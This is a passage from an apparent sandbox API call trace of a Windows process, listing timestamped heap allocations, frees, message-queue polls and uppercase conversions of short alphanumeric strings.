hHeap=0x25c0000) returned 1 [0265.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0265.861] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.861] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0265.861] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.861] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0265.861] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0265.861] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0265.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0265.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0265.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0265.861] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0265.861] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.861] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0265.861] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0265.862] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0265.862] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0265.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0265.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0265.862] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0265.862] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b18d8 [0265.862] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0265.862] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0265.862] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0265.862] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0265.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0265.862] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1c98 [0265.862] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0265.862] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0265.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0265.862] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa8c0 [0265.862] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0265.862] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0265.862] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0265.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0265.863] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0265.863] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0265.863] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0265.863] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0265.863] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0265.863] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0265.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0265.863] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0265.863] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0265.863] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0265.863] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c18 [0265.863] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0265.863] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24acc60 [0265.863] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0265.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0265.863] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0265.863] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0265.864] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0265.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0265.864] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0265.864] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0265.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0265.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0265.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0265.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0265.864] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0265.864] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.864] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0265.864] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0265.864] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0265.865] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0265.865] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0265.865] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0265.865] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0265.865] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0265.865] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0265.865] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0265.865] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0265.865] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0265.865] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0265.865] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0265.865] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0265.865] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0265.865] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0265.865] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0265.865] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.865] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0265.866] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.866] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0265.866] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0265.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0265.866] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0265.866] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0265.866] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0265.866] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0265.866] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0265.866] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0265.866] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0265.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0265.866] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0265.866] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0265.866] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0265.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0265.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0265.866] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0265.866] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.867] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0265.867] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0265.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0265.867] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0265.867] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0265.867] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0265.867] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0265.867] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0265.867] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0265.867] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0265.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0265.867] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0265.867] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0265.867] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0265.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0265.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0265.867] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0265.867] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0265.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0265.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0265.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0265.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0265.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0265.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0265.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0265.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0265.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0265.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0265.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0265.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0265.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0265.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0265.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0265.868] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0265.868] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0265.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0265.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0265.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0265.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0265.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0265.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0265.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0265.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0265.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0265.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0265.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0265.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0265.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0265.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0265.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0265.869] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0265.869] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0265.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0265.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0265.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0265.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0265.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0265.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0265.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0265.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0265.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0265.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0265.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0265.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0265.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0265.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0265.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0265.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0265.870] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0265.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0265.871] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0265.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0265.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0265.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa1d0 [0265.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0265.871] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0265.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0265.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0265.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0265.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0265.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0265.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0265.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0265.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2412248 [0265.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0265.871] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0265.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0265.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0265.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0265.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0265.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0265.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0265.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0265.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0265.872] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0265.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0265.872] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0265.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0265.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0265.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2412248 [0265.872] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0265.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0265.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0265.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9cd8 [0265.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0265.872] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0265.873] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0265.873] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0265.873] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0265.873] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0265.873] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0265.873] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0265.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0265.873] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0265.873] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0265.873] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0265.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0265.873] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0265.873] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0265.873] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0265.873] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0265.873] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0265.873] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0265.873] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0265.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0265.874] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0265.874] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0265.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0265.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0265.874] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: 